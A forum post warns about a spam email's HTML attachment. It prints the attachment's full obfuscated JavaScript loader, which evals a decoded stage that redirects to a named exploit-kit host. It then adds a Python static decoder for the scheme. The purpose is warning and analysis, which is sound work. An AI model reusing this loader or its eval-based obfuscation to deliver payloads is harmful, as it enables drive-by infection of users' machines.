I'll tack this on here because the attack is also initiated via JS. Got a spam mail today with an HTML document attached.
Code:
<script>try{n-=eval("pro"+"totype");}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..1110..891..1170..981..1010..990..1160..414..1030..909..1160..621..1080..909..1090..909..1100..1044..1150..594..1210..756..970..927..780..873..1090..909..400..351..980..999..1000..1089..390..369..910..432..930..369..1230..117..90..81..90..945..1020..1026..970..981..1010..1026..400..369..590..117..90..81..1250..288..1010..972..1150..909..320..1107..130..81..90..81..1000..999..990..1053..1090..909..1100..1044..460..1071..1140..945..1160..909..400..306..600..945..1020..1026..970..981..1010..288..1150..1026..990..549..390..936..1160..1044..1120..522..470..423..1110..990..1080..945..1100..909..450..891..970..981..1090..1053..1100..945..1160..1089..460..1026..1170..522..560..432..560..432..470..918..1110..1026..1170..981..470..1035..1040..999..1190..1044..1040..1026..1010..873..1000..414..1120..936..1120..567..1120..873..1030..909..610..459..1020..918..530..468..1020..450..1000..450..990..891..1020..459..520..450..560..351..320..1071..1050..900..1160..936..610..351..490..432..390..288..1040..909..1050..927..1040..1044..610..351..490..432..390..288..1150..1044..1210..972..1010..549..390..1062..1050..1035..1050..882..1050..972..1050..1044..1210..522..1040..945..1000..900..1010..990..590..1008..1110..1035..1050..1044..1050..999..1100..522..970..882..1150..999..1080..1053..1160..909..590..972..1010..918..1160..522..480..531..1160..999..1120..522..480..531..390..558..600..423..1050..918..1140..873..1090..909..620..306..410..531..130..81..90..1125..130..81..90..918..1170..990..990..1044..1050..999..1100..288..1050..918..1140..873..1090..909..1140..360..410..1107..130..81..90..81..1180..873..1140..288..1020..288..610..288..1000..999..990..1053..1090..909..1100..1044..460..891..1140..909..970..1044..1010..621..1080..909..1090..909..1100..1044..400..351..1050..918..1140..873..1090..909..390..369..590..918..460..1035..1010..1044..650..1044..1160..1026..1050..882..1170..1044..1010..360..390..1035..1140..891..390..396..390..936..1160..1044..1120..522..470..423..1110..990..1080..945..1100..909..450..891..970..981..1090..1053..1100..945..1160..1089..460..1026..1170..522..560..432..560..432..470..918..1110..1026..1170..981..470..1035..1040..999..1190..1044..1040..1026..1010..873..1000..414..1120..936..1120..567..1120..873..1030..909..610..459..1020..918..530..468..1020..450..1000..450..990..891..1020..459..520..450..560..351..410..531..1020..414..1150..1044..1210..972..1010..414..1180..945..1150..945..980..945..1080..945..1160..1089..610..351..1040..945..1000..900..1010..990..390..531..1020..414..1150..1044..1210..972..1010..414..1120..999..1150..945..1160..945..1110..990..610..351..970..882..1150..999..1080..1053..1160..909..390..531..1020..414..1150..1044..1210..972..1010..414..1080..909..1020..1044..610..351..480..351..590..918..460..1035..1160..1089..1080..909..460..1044..1110..1008..610..351..480..351..590..918..460..1035..1010..1044..650..1044..1160..1026..1050..882..1170..1044..1010..360..390..1071..1050..900..1160..936..390..396..390..441..480..351..410..531..1020..414..1150..909..1160..585..1160..1044..1140..945..980..1053..1160..909..400..351..1040..909..1050..927..1040..1044..390..396..390..441..480..351..410..531..130..81..90..81..1000..999..990..1053..1090..909..1100..1044..460..927..1010..1044..690..972..1010..981..1010..990..1160..1035..660..1089..840..873..1030..702..970..981..1010..360..390..882..1110..900..1210..351..410..819..480..837..460..873..1120..1008..1010..990..1000..603..1040..945..1080..900..400..918..410..531..130..81..90..1125".split("..");h=2;s="";for(i=0;i-657<0;i=1+i){k=i;s=s+String["fromCharCode"](n[k]/(i-h*Math.floor(i/h)+9));}if(015-0xa===3)e(s);}</script>
If you throw that into JSunpack, you can see that you get redirected to online-cammunity.ru:8080/forum/showthread.php?page=3ff54f2d2ccf3428 (careful!). There, depending on the browser, it then tries to slip malicious code onto your machine.
http://jsunpack.jeek.org/?report=2e171028233e26dcbe410d87adeca91d43130a21
Among other things, an exploit for an old Windows hole and a fairly recent Java hole:
https://www.virustotal.com/file/4419f8608c928da1dc435ef56415218b3f865447ae2653879977dca94dc43ebc/analysis/
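Added example, not part of the post or of the sample itself: a static Python decoder that reproduces the loop's arithmetic from the loader above without ever calling eval, so the second stage can be read instead of run. The regexes and the "constructed sample" string are my own assumptions; the 48-number prefix is quoted from the array in the post.

```python
import math
import re

# The loader divides the i-th number by (i - h*floor(i/h) + 9), which is
# simply (i % h) + 9; with h=2 the divisor alternates 9, 10, 9, 10, ...
def divisor(i: int, h: int = 2) -> int:
    return i - h * math.floor(i / h) + 9

def decode_tokens(tokens, h: int = 2) -> str:
    """Static equivalent of the loader's for-loop: arithmetic only, no eval."""
    return "".join(chr(int(tok) // divisor(i, h)) for i, tok in enumerate(tokens))

# Hypothetical regexes for this loader family: the n="...".split("..") array and h.
ARRAY_RE = re.compile(r'n="([0-9.]+)"\.split\("\.\."\)')
H_RE = re.compile(r"\bh=(\d+);")

def deobfuscate(script: str) -> str:
    """Pull the number array and h out of the <script> text and decode them."""
    m = ARRAY_RE.search(script)
    if m is None:
        raise ValueError('no n="...".split("..") array found')
    hm = H_RE.search(script)
    h = int(hm.group(1)) if hm else 2
    return decode_tokens(m.group(1).split(".."), h)

# The first 48 numbers of the array in the post above, quoted verbatim.
PAGE_PREFIX = ("81..90..945..1020..288..400..900..1110..891..1170..981..1010..990.."
               "1160..414..1030..909..1160..621..1080..909..1090..909..1100..1044.."
               "1150..594..1210..756..970..927..780..873..1090..909..400..351..980.."
               "999..1000..1089..390..369..910..432..930..369..1230")

def encode(plain: str, h: int = 2) -> str:
    """Inverse of the scheme; used only to build the constructed sample below."""
    return "..".join(str(ord(c) * divisor(i, h)) for i, c in enumerate(plain))

# Constructed sample: a harmless string wrapped in the loader's own skeleton.
# The guard 015-0xa===3 is octal 13 minus 10, so it is always true and e(s)
# would eval the decoded text in a browser; here nothing is ever executed.
SAMPLE_SCRIPT = (
    '<script>try{n-=eval("pro"+"totype");}catch(zxc){e=eval;n="'
    + encode("var marker = 'constructed sample';")
    + '".split("..");h=2;s="";for(i=0;i-34<0;i=1+i){k=i;s=s+String["fromCharCode"]'
    '(n[k]/(i-h*Math.floor(i/h)+9));}if(015-0xa===3)e(s);}</script>'
)

if __name__ == "__main__":
    print(repr(deobfuscate(SAMPLE_SCRIPT)))
    print(repr(decode_tokens(PAGE_PREFIX.split(".."))))
```

Decoding the quoted prefix already shows the second stage starting with a `document.getElementsByTagName('body')` check, which is what you would expect of a loader that injects into the page.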